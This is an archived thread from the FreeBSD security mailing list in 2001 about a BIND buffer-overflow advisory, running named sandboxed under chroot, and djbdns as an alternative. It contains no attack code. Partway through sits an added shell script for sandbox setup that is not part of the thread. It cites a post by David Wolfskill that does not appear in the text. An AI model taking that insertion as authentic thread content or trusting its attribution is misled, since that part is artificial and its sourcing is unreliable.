Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 31 Jan 2001, Alfred Perlstein wrote:

> * Brian Behlendorf [010131 14:47] wrote:
> > On Wed, 31 Jan 2001, Alfred Perlstein wrote:
> > > * Roman Shterenzon [010131 13:56] wrote:
> > > > On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote:
> > > >
> > > > > =============================================================================
> > > > > FreeBSD-SA-01:18 Security Advisory
> > > > >
> > > > > Topic: BIND remotely exploitable buffer overflow
> > > > ..snip..
> > > >
> > > > Why not make it default in the base system?
> > >
> > > It has been, but only for several days.
> >
> > I think he meant, why not set those recommendations for running as user
> > "bind" and in a chroot jail as the default?
> > Unless I'm missing something, that's not the case currently:
> >
> > [yez] 2:47pm ~ > fgrep -i named_flag /etc/defaults/rc.conf
> > named_flags=""                  # Flags for named
> > #named_flags="-u bind -g bind"  # Flags for named
>
> Since named supports a command line option for chroot as well
> as user flags (-t) it would be trivial to have it the default.
>
> It's pretty much a toss-up between usability and security.

It's more secure than "unusable" :)

> I guess this is the final blow for me, and I think we should
> run bind in a sandbox at this point, I'm just worried about
> confusing newbies who wish to set it up.

That was my point.

> If anyone has a proposal on doing it by default that doesn't
> impact ease of use (or if already doesn't impact it) then I'm
> for it.

Change /etc/defaults/rc.conf and tweak named installation to chown /var/named; add user named and group named to shipping /etc/passwd and /etc/group

> What I'm worrying about specifically is ndc and other utilities
> basically are unix domain sockets not in the expected place all of
> sudden?

Hmm.. interesting point. I guess they are created in /var/named which is accessible from the outer world.

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel.
Tel: +972-9-9522361 ]

From owner-freebsd-security Wed Jan 31 15:42:54 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 490DE37B67D for ; Wed, 31 Jan 2001 15:42:37 -0800 (PST)
Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f0VNgUm20557; Wed, 31 Jan 2001 15:42:30 -0800 (PST) (envelope-from dillon)
Date: Wed, 31 Jan 2001 15:42:30 -0800 (PST)
From: Matt Dillon
Message-Id: <200101312342.f0VNgUm20557@earth.backplane.com>
To: Mike Silbersack
Cc: Alfred Perlstein , Brian Behlendorf , Roman Shterenzon ,
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
References:
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:I don't see any complaints from 8.2.3 running -u bind -g bind when I HUP
:it here.
:
:(Well, ok, I see the can't create pidfile junk, but that's not critical
:IMHO.)
:
:Mike "Silby" Silbersack

    Hmm. maybe Paul fixed the close/reopen of the sockets. Or I could be full of it... ah, wait, I remember. The interface rescanning is broken when you run in a sandbox (it can't bind to new sockets from the sandbox). If your interfaces don't change out from under you, you should be ok.
-Matt

From owner-freebsd-security Wed Jan 31 15:54:01 2001
Delivered-To: freebsd-security@freebsd.org
Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id E62CB37B699 for ; Wed, 31 Jan 2001 15:53:27 -0800 (PST)
Received: (qmail 28880 invoked by uid 1001); 31 Jan 2001 23:53:25 +0000 (GMT)
To: dillon@earth.backplane.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
From: sthaug@nethelp.no
In-Reply-To: Your message of "Wed, 31 Jan 2001 15:27:25 -0800 (PST)"
References: <200101312327.f0VNRPv20077@earth.backplane.com>
X-Mailer: Mew version 1.05+ on Emacs 19.34.2
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Date: Thu, 01 Feb 2001 00:53:25 +0100
Message-ID: <28878.980985205@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> You gotta work with what you have. Bind outsmarts itself in a lot
> of places, especially the stupid interface scanning/binding
> code.

Agreed.

> The
> last thing I want it to do is hold *any* state from the previous
> incarnation across a restart. Frankly, restarting is not a big deal
> even if you have hundreds or thousands of domains. I always restarted
> named at BEST rather than HUP it, because HUPing is simply too
> dangerous when you make random modifications to dozens of primary
> zone files out of thousands.

Disagree. The problem here is that named stops answering queries for a long time while it is sucking in the zone files. This is mostly a problem for servers with many thousands of domains - but in those cases it can be quite noticeable. Here's a server with 14000 zones:

Jan 28 22:22:31 nn named[8645]: starting (/etc/named.conf). named 8.2.3-REL
...
Jan 28 22:33:26 nn named[8740]: Ready to answer queries.
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Wed Jan 31 16:50:07 2001
Delivered-To: freebsd-security@freebsd.org
Received: from yeti.ismedia.pl (yeti.ismedia.pl [212.182.96.18]) by hub.freebsd.org (Postfix) with SMTP id 024AD37B67D for ; Wed, 31 Jan 2001 16:49:45 -0800 (PST)
Received: (qmail 79468 invoked from network); 1 Feb 2001 00:51:24 -0000
Received: from unknown (HELO lagoon.freebsd.lublin.pl) (212.182.115.11) by 0 with SMTP; 1 Feb 2001 00:51:24 -0000
Received: (qmail 36040 invoked from network); 1 Feb 2001 00:48:19 -0000
Received: from unknown (HELO riget.scene.pl) () by 0 with SMTP; 1 Feb 2001 00:48:19 -0000
Received: (qmail 36037 invoked by uid 1001); 1 Feb 2001 00:48:19 -0000
Date: Thu, 1 Feb 2001 01:48:19 +0100
From: Przemyslaw Frasunek
To: freebsd-security@freebsd.org
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-ID: <20010201014819.H675@riget.scene.pl>
References: <200101312123.f0VLNL134920@freefall.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from roman@xpert.com on Wed, Jan 31, 2001 at 11:55:18PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Jan 31, 2001 at 11:55:18PM +0200, Roman Shterenzon wrote:
> Why not make it default in the base system?

The best workaround is not using BIND at all. Consider some alternatives, like /usr/ports/net/djbdns.
-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

From owner-freebsd-security Wed Jan 31 17:02:06 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shemp.palomine.net (shemp.palomine.net [205.198.88.200]) by hub.freebsd.org (Postfix) with SMTP id 7A5DD37B69D for ; Wed, 31 Jan 2001 17:01:45 -0800 (PST)
Received: (qmail 90301 invoked by uid 1000); 1 Feb 2001 01:01:42 -0000
Date: Wed, 31 Jan 2001 20:01:42 -0500
From: Chris Johnson
To: Przemyslaw Frasunek
Cc: freebsd-security@freebsd.org
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-ID: <20010131200142.A90211@palomine.net>
References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010201014819.H675@riget.scene.pl>; from venglin@freebsd.lublin.pl on Thu, Feb 01, 2001 at 01:48:19AM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Feb 01, 2001 at 01:48:19AM +0100, Przemyslaw Frasunek wrote:
> On Wed, Jan 31, 2001 at 11:55:18PM +0200, Roman Shterenzon wrote:
> > Why not make it default in the base system?
>
> The best workaround is not using BIND at all. Consider some alternatives,
> like /usr/ports/net/djbdns.

Yes! Why work around BIND limitations and do all this sandboxing to try to limit the damage it can do to you, when there's a better alternative?
Chris

From owner-freebsd-security Wed Jan 31 17:51:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 2CB9C37B69E for ; Wed, 31 Jan 2001 17:51:15 -0800 (PST)
Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f111omZ23184; Wed, 31 Jan 2001 17:50:48 -0800 (PST) (envelope-from dillon)
Date: Wed, 31 Jan 2001 17:50:48 -0800 (PST)
From: Matt Dillon
Message-Id: <200102010150.f111omZ23184@earth.backplane.com>
To: sthaug@nethelp.no
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
References: <200101312327.f0VNRPv20077@earth.backplane.com> <28878.980985205@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:
:Disagree. The problem here is that named stops answering queries for a
:long time while it is sucking in the zone files. This is mostly a problem
:for servers with many thousands of domains - but in those cases it can be
:quite noticeable. Here's a server with 14000 zones:
:
:Jan 28 22:22:31 nn named[8645]: starting (/etc/named.conf). named 8.2.3-REL

    Umm... respectfully, you are not configuring your system correctly if the down time affects you. This is what we did at BEST:

    * Three machines running named, recursive enabled, not serving any primary zones. All machines and customers accessed these three DNS servers to do lookups. We generally did not restart these, and when we did the restarts were instantaneous (since they weren't primary for any zones).

    * Three machines running named, non-recursive, ONLY used to serve primary and secondary zones. At least 20,000 zones, dup'd to each box. We updated the primary DNS boxes four times a day. We updated the boxes one at a time, so at any given moment only one was 'down'.
    The DNS protocols handle the rest. It's perfectly acceptable for a primary NS to be down as long as other primary NS's are up.

-Matt

From owner-freebsd-security Wed Jan 31 17:54:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id E08CB37B6A8 for ; Wed, 31 Jan 2001 17:54:36 -0800 (PST)
Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f111sYE23275; Wed, 31 Jan 2001 17:54:34 -0800 (PST) (envelope-from dillon)
Date: Wed, 31 Jan 2001 17:54:34 -0800 (PST)
From: Matt Dillon
Message-Id: <200102010154.f111sYE23275@earth.backplane.com>
To: Chris Johnson
Cc: Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl> <20010131200142.A90211@palomine.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:Yes! Why work around BIND limitations and do all this sandboxing to try to
:limit the damage it can do to you, when there's a better alternative?
:
:Chris

    Yah, that's the ticket... kinda like wu-ftpd was created because existing ftpd's weren't up to snuff, except wu-ftpd turned out to have literally dozens of rootable exploits.

    Just because BIND's loopholes are advertised doesn't mean that other DNS servers don't have loopholes. While I agree that some of the newer ones almost certainly have *fewer* rootable loopholes, maybe, I don't see them as improving my risk factors much.
-Matt

From owner-freebsd-security Wed Jan 31 18:02:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shemp.palomine.net (shemp.palomine.net [205.198.88.200]) by hub.freebsd.org (Postfix) with SMTP id 279DC37B69E for ; Wed, 31 Jan 2001 18:02:35 -0800 (PST)
Received: (qmail 91682 invoked by uid 1000); 1 Feb 2001 02:02:33 -0000
Date: Wed, 31 Jan 2001 21:02:33 -0500
From: Chris Johnson
To: Matt Dillon
Cc: Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-ID: <20010131210232.A91629@palomine.net>
References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl> <20010131200142.A90211@palomine.net> <200102010154.f111sYE23275@earth.backplane.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200102010154.f111sYE23275@earth.backplane.com>; from dillon@earth.backplane.com on Wed, Jan 31, 2001 at 05:54:34PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Jan 31, 2001 at 05:54:34PM -0800, Matt Dillon wrote:
> :Yes! Why work around BIND limitations and do all this sandboxing to try to
> :limit the damage it can do to you, when there's a better alternative?
> :
> :Chris
>
> Yah, that's the ticket... kinda like wu-ftpd was created because existing
> ftpd's weren't up to snuff, except wu-ftpd turned out to have literally
> dozens of rootable exploits.
>
> Just because BIND's loopholes are advertised doesn't mean that other
> DNS servers don't have loopholes. While I agree that some of the newer
> ones almost certainly have *fewer* rootable loopholes, maybe, I don't
> see them as improving my risk factors much.

Except that djbdns was written by Dan Bernstein (of qmail fame). He doesn't know how to write rootable software.
Chris

From owner-freebsd-security Wed Jan 31 18:03:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 82F0837B69E for ; Wed, 31 Jan 2001 18:03:39 -0800 (PST)
Received: (qmail 1146 invoked by uid 1000); 1 Feb 2001 02:03:38 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Feb 2001 02:03:38 -0000
Date: Wed, 31 Jan 2001 20:03:38 -0600 (CST)
From: Mike Silbersack
To: Matt Dillon
Cc: Chris Johnson , Przemyslaw Frasunek ,
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
In-Reply-To: <200102010154.f111sYE23275@earth.backplane.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 31 Jan 2001, Matt Dillon wrote:

> :Yes! Why work around BIND limitations and do all this sandboxing to try to
> :limit the damage it can do to you, when there's a better alternative?
> :
> :Chris
>
> Yah, that's the ticket... kinda like wu-ftpd was created because existing
> ftpd's weren't up to snuff, except wu-ftpd turned out to have literally
> dozens of rootable exploits.
>
> Just because BIND's loopholes are advertised doesn't mean that other
> DNS servers don't have loopholes. While I agree that some of the newer
> ones almost certainly have *fewer* rootable loopholes, maybe, I don't
> see them as improving my risk factors much.
>
> -Matt

Heh, that's what I said to myself after 8.2.2-P5 came out, so I stopped using djbdns and switched back to bind. After the recent batch of BIND bugs, I've learned my lesson.

I guess I should give BIND 9 a chance, though. After all, all the important holes in BIND have been parts of the dnssec code, not parts of the core BIND functionality.
Mike "Silby" Silbersack

From owner-freebsd-security Wed Jan 31 18:14:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id D217E37B4EC for ; Wed, 31 Jan 2001 18:14:03 -0800 (PST)
Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id VAA74294; Wed, 31 Jan 2001 21:13:53 -0500 (EST)
Date: Wed, 31 Jan 2001 21:13:52 -0500 (EST)
From:
To: Chris Johnson
Cc: Matt Dillon , Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
In-Reply-To: <20010131210232.A91629@palomine.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 31 Jan 2001, Chris Johnson wrote:

> Except that djbdns was written by Dan Bernstein (of qmail fame). He doesn't
> know how to write rootable software.

If I can.. get in a .... few words between... fits.. of.. laughter. Can we now kill this thread since it's reached the bottom of the barrel clue wise?

=============================================================================
-Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek
Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas
Home: scanner@deceptively.shady.org | http://open-systems.net
=============================================================================
WINDOWS: "Where do you want to go today?"
LINUX: "Where do you want to go tomorrow?"
BSD: "Are you guys coming or what?"
=============================================================================
irc.openprojects.net #FreeBSD -Join the revolution!
ICQ: 20016186

From owner-freebsd-security Wed Jan 31 18:16:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dt051n37.san.rr.com (dt051n37.san.rr.com [204.210.32.55]) by hub.freebsd.org (Postfix) with ESMTP id 4D21E37B4EC for ; Wed, 31 Jan 2001 18:16:35 -0800 (PST)
Received: from slave (Studded@slave [10.0.0.1]) by dt051n37.san.rr.com (8.9.3/8.9.3) with ESMTP id SAA20073; Wed, 31 Jan 2001 18:15:50 -0800 (PST) (envelope-from DougB@gorean.org)
Date: Wed, 31 Jan 2001 18:15:50 -0800 (PST)
From: Doug Barton
X-X-Sender:
To: Alfred Perlstein
Cc: Brian Behlendorf , Roman Shterenzon ,
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
In-Reply-To: <20010131145423.H26076@fw.wintelcom.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 31 Jan 2001, Alfred Perlstein wrote:

> Since named supports a command line option for chroot as well
> as user flags (-t) it would be trivial to have it the default.

Actually, it's not trivial to do the chroot version properly. There are several files, directories, and one device that have to be created in the chroot environment. Also, /etc/ is not a good choice for the chroot, it really should be something like /usr/named, or /usr/local/named since the quantity of zone files could be quite large, and variable in nature.

> It's pretty much a toss-up between usability and security.

When done properly (with appropriate compiled-in defaults) the only functionality you lose is the ability to bind new interfaces while named is running. As Matt pointed out, this "feature" is of dubious value at best.

> I guess this is the final blow for me, and I think we should
> run bind in a sandbox at this point, I'm just worried about
> confusing newbies who wish to set it up.
>
> If anyone has a proposal on doing it by default that doesn't
> impact ease of use (or if already doesn't impact it) then I'm
> for it.

Jeroen and I are kicking around some ideas. I'm thinking of a make.conf variable that will specify the location of the chroot dir. Something like BIND_CHROOT=/usr/local/named. Questions to be resolved are; location, default to on or off, etc. So far there is pretty good support for at least providing the option to do this in the base, so I think it will happen sometime "soon," depending on how soon the two of us (or someone else) can get to it.

> What I'm worrying about specifically is ndc and other utilities
> basically are unix domain sockets not in the expected place all of
> sudden?

That's one of the things you compile in. Let's say that you want your chroot to be /usr/local/named. You set DESTRUN in the bind makefile to /usr/local/named/var so named knows where to write its FIFO when it starts up, and you make that var directory rw for the bind user. QED.

BTW, just running with -u bind -g bind does not constitute "running in a sandbox." It does help to have bind drop privs, but the chroot stuff is what constitutes a true sandbox.

Doug

-- 
"Pain heals. Chicks dig scars. Glory . . . lasts forever."
-- Keanu Reeves as Shane Falco in "The Replacements"
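The three practical points made in this thread, as one added shell example (not code from the thread and not from the FreeBSD bind build): the chroot layout Doug describes above (directories, a writable var/run for the pid file and ndc FIFO, and a /dev/null node), David Wolfskill's warning earlier that a bare "ndc restart" brings named back as root unless the -u bind -g bind flags are repeated, and his ps check that the running named has the bind uid. The chroot root /usr/local/named, the user and group "bind" and /etc/defaults/rc.conf come from the posts; the exact subdirectory set, the named.conf source path, the /dev/null major/minor numbers and the function names are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not part of the thread. Three helpers for a BIND 8 sandbox
# on FreeBSD of the era discussed:
#   make_chroot_tree  - directory tree, pid/FIFO dir and /dev/null for -t
#   ndc_restart_cmd   - restart command derived from rc.conf named_flags,
#                       so "ndc restart" does not silently come back as root
#   check_named_owner - verify from ps output that named runs as "bind"
# Paths below /usr/local/named and the 2,2 device numbers are assumptions.

# 1. Chroot layout.  $1 = chroot root, $2 = unprivileged user, $3 = group.
make_chroot_tree() {
    root="$1"; user="${2:-bind}"; group="${3:-bind}"
    for d in etc/namedb var/run dev; do
        mkdir -p "$root/$d" || return 1
    done
    # named needs /dev/null inside the jail. mknod needs root; 2,2 is the
    # traditional FreeBSD major/minor for /dev/null (verify: ls -l /dev/null).
    if [ ! -c "$root/dev/null" ] && [ "$(id -u)" = 0 ]; then
        mknod "$root/dev/null" c 2 2 && chmod 666 "$root/dev/null"
    fi
    # Config and zones are copied under the chroot (assumed source path).
    if [ -f /etc/namedb/named.conf ]; then
        cp /etc/namedb/named.conf "$root/etc/namedb/"
    fi
    # Only var/run is owned by the sandbox user: named.pid and the ndc
    # control FIFO land there (what DESTRUN points at in the bind build).
    # Config and zones stay root-owned so a compromised named cannot
    # rewrite its own configuration.
    if [ "$(id -u)" = 0 ] && id "$user" >/dev/null 2>&1; then
        chown -R root:wheel "$root"
        chown "$user:$group" "$root/var/run"
    fi
    chmod 755 "$root/var/run"
    return 0
}

# 2. Restart without losing the sandbox.  $1 = rc.conf to read.  Prints the
#    ndc command built from the last uncommented named_flags="..." line and
#    returns 1 when those flags carry no -u, i.e. the restart would be root.
ndc_restart_cmd() {
    flags=$(sed -n 's/^named_flags="\([^"]*\)".*/\1/p' "$1" | tail -n 1)
    case "$flags" in
        *-u*) echo "ndc restart $flags"; return 0 ;;
        *)    echo "ndc restart $flags" | sed 's/ *$//'; return 1 ;;
    esac
}

# 3. Owner check.  Reads "user command..." lines as printed by
#    ps -axo user=,command= on stdin; $1 is the expected user.
#    Exit 0: every named runs as $1.  1: some named runs as another user
#    (typically root after a bare "ndc restart").  2: no named running.
check_named_owner() {
    awk -v want="$1" '
        { cmd = $2; sub(/.*\//, "", cmd) }            # basename of argv[0]
        cmd == "named" { n++; if ($1 != want) bad++ }
        END { if (n == 0) exit 2; if (bad > 0) exit 1; exit 0 }'
}

# Wrapper against the live process table (BSD-style ps options).
named_runs_as() {
    ps -axo user=,command= | check_named_owner "${1:-bind}"
}

# Demo, opt-in so the file can be sourced: BIND_SANDBOX_DEMO=1 sh this.sh
if [ "${BIND_SANDBOX_DEMO:-0}" = 1 ]; then
    make_chroot_tree /tmp/named-demo bind bind && find /tmp/named-demo
    # constructed rc.conf line, the shipping default quoted in the thread
    printf 'named_flags=""\t\t# Flags for named\n' > /tmp/named-demo.rc
    ndc_restart_cmd /tmp/named-demo.rc || echo "(would restart named as root)"
    named_runs_as bind; echo "named_runs_as bind -> $?"
fi
```

Run make_chroot_tree as root on the nameserver, start named with -t /usr/local/named -u bind -g bind, and call named_runs_as bind after every restart; a non-zero exit is exactly the silent root restart David warns about. ndc_restart_cmd returns 1 on the shipping rc.conf default (named_flags=""), which is the state Roman's fgrep shows.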
From owner-freebsd-security Wed Jan 31 18:24:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shemp.palomine.net (shemp.palomine.net [205.198.88.200]) by hub.freebsd.org (Postfix) with SMTP id D6C4737B503 for ; Wed, 31 Jan 2001 18:24:35 -0800 (PST)
Received: (qmail 92149 invoked by uid 1000); 1 Feb 2001 02:24:34 -0000
Date: Wed, 31 Jan 2001 21:24:34 -0500
From: Chris Johnson
To: scanner@jurai.net
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Message-ID: <20010131212434.A92130@palomine.net>
References: <20010131210232.A91629@palomine.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from scanner@jurai.net on Wed, Jan 31, 2001 at 09:13:52PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Jan 31, 2001 at 09:13:52PM -0500, scanner@jurai.net wrote:
> On Wed, 31 Jan 2001, Chris Johnson wrote:
>
> > Except that djbdns was written by Dan Bernstein (of qmail fame). He doesn't
> > know how to write rootable software.
>
> If I can.. get in a .... few words
> between... fits.. of.. laughter. Can we now kill this thread since it's
> reached the bottom of the barrel clue wise?

Fine. Continue to use BIND at your own peril.
Chris

From owner-freebsd-security Wed Jan 31 18:34:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 069D837B69F for ; Wed, 31 Jan 2001 18:33:55 -0800 (PST)
Received: (qmail 1195 invoked by uid 1000); 1 Feb 2001 02:33:52 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Feb 2001 02:33:52 -0000
Date: Wed, 31 Jan 2001 20:33:52 -0600 (CST)
From: Mike Silbersack
To:
Cc: Chris Johnson , Matt Dillon , Przemyslaw Frasunek ,
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 31 Jan 2001 scanner@jurai.net wrote:

> On Wed, 31 Jan 2001, Chris Johnson wrote:
>
> > Except that djbdns was written by Dan Bernstein (of qmail fame). He doesn't
> > know how to write rootable software.
>
> If I can.. get in a .... few words
> between... fits.. of.. laughter. Can we now kill this thread since it's
> reached the bottom of the barrel clue wise?
>
> =============================================================================
> -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek

ROFL

Two messages after your post in my inbox is a message TdR forwarded to bugtraq about ISC about pay-for-advanced info on bugs. You're right, we're silly to be advocating non-isc software.
Mike "Silby" Silbersack

From owner-freebsd-security Wed Jan 31 19:19:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from xs4some.net (CC4140-a.sneek1.fr.nl.home.com [212.120.108.75]) by hub.freebsd.org (Postfix) with ESMTP id 34F5137B69B; Wed, 31 Jan 2001 19:19:22 -0800 (PST)
Received: by xs4some.net (Postfix, from userid 1000) id 4FB172C930; Thu, 1 Feb 2001 04:19:21 +0100 (CET)
From: Fenix
To: freebsd-security@freebsd.org
Subject: sendmail vs. postfix question
Date: Thu, 1 Feb 2001 04:19:20 +0100
X-Mailer: KMail [version 1.1.99]
Content-Type: text/plain; charset="iso-8859-1"
Cc: freebsd-questions@freebsd.org
MIME-Version: 1.0
Message-Id: <01020104192002.01203@xs4some.net>
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I have a little question about sendmail vs. postfix .... Are there any known recent problems with sendmail security? What about postfix? Which one of these two MTAs is more efficient for a small site concerning resource usage and speed .... If anyone can comment on this or redirect me to some docs on the net I will appreciate it ...

Thx!

Greets
Fenix
-- 
If you have to hate, hate gently ....
From owner-freebsd-security Wed Jan 31 19:25:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tandem.milestonerdl.com (tandem.milestonerdl.com [204.107.138.1]) by hub.freebsd.org (Postfix) with ESMTP id 8AF2637B69B for ; Wed, 31 Jan 2001 19:25:01 -0800 (PST)
Received: from tandem (tandem [204.107.138.1]) by tandem.milestonerdl.com (8.11.1/8.10.0) with ESMTP id a113PYo06935; Wed, 31 Jan 1996 21:25:34 -0600 (CST)
Date: Wed, 31 Jan 1996 21:25:34 -0600 (CST)
From: Marc Rassbach
To: Chris Johnson
Cc: Matt Dillon , Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
In-Reply-To: <20010131210232.A91629@palomine.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 31 Jan 2001, Chris Johnson wrote:

> On Wed, Jan 31, 2001 at 05:54:34PM -0800, Matt Dillon wrote:
> > :Yes! Why work around BIND limitations and do all this sandboxing to try to
> > :limit the damage it can do to you, when there's a better alternative?
> > :Chris
> > Yah, that's the ticket... kinda like wu-ftpd was created because existing
> > ftpd's weren't up to snuff, except wu-ftpd turned out to have literally
> > dozens of rootable exploits.
> Except that djbdns was written by Dan Bernstein (of qmail fame). He doesn't
> know how to write rootable software.

And you know this because?

Have you done some DNA test and found that Dan Bernstein is not human and therefore unable to make mistakes?

Oh, and any 'secret memos/emails' from BIND developers showing that they set out to write 'rootable' software would also be good to see.
From owner-freebsd-security Wed Jan 31 20:33:10 2001
From: Thomas Cannon
To: Marc Rassbach
Cc: Chris Johnson, Matt Dillon, Przemyslaw Frasunek, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Date: Wed, 31 Jan 2001 20:32:00 -0800 (PST)

> Have you done some DNA test and found that Dan Bernstein is not human and
> therefore unable to make mistakes?

I think the fact that he puts his own money on the fact that there are no exploitable flaws in qmail or his DNS implementation shows an obvious commitment to proactive security. I'm sure that is all that was implied. I've a feeling the ISC isn't sending anyone a check for the bind exploit just posted to bugtraq from nobody@replay.com, or to NAI labs.

It's sorta like OpenBSD -- sure, mistakes happen. They just make a hell of a lot less of them because it's part of what they are trying to achieve.
Thomas

From owner-freebsd-security Wed Jan 31 20:35:46 2001
From: Brian Behlendorf
To: Mike Silbersack
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind
Date: Wed, 31 Jan 2001 20:36:05 -0800 (PST)

On Wed, 31 Jan 2001, Mike Silbersack wrote:
> On Wed, 31 Jan 2001, Alfred Perlstein wrote:
>
> > If it breaks HUP, then not really. :)
> >
> > I'm not sure how bind handles restarts, but even if it exec(2)s over
> > itself it can track the fd open for its socket and shouldn't have to
> > rebind it.
>
> I don't see any complaints from 8.2.3 running -u bind -g bind when I HUP
> it here.

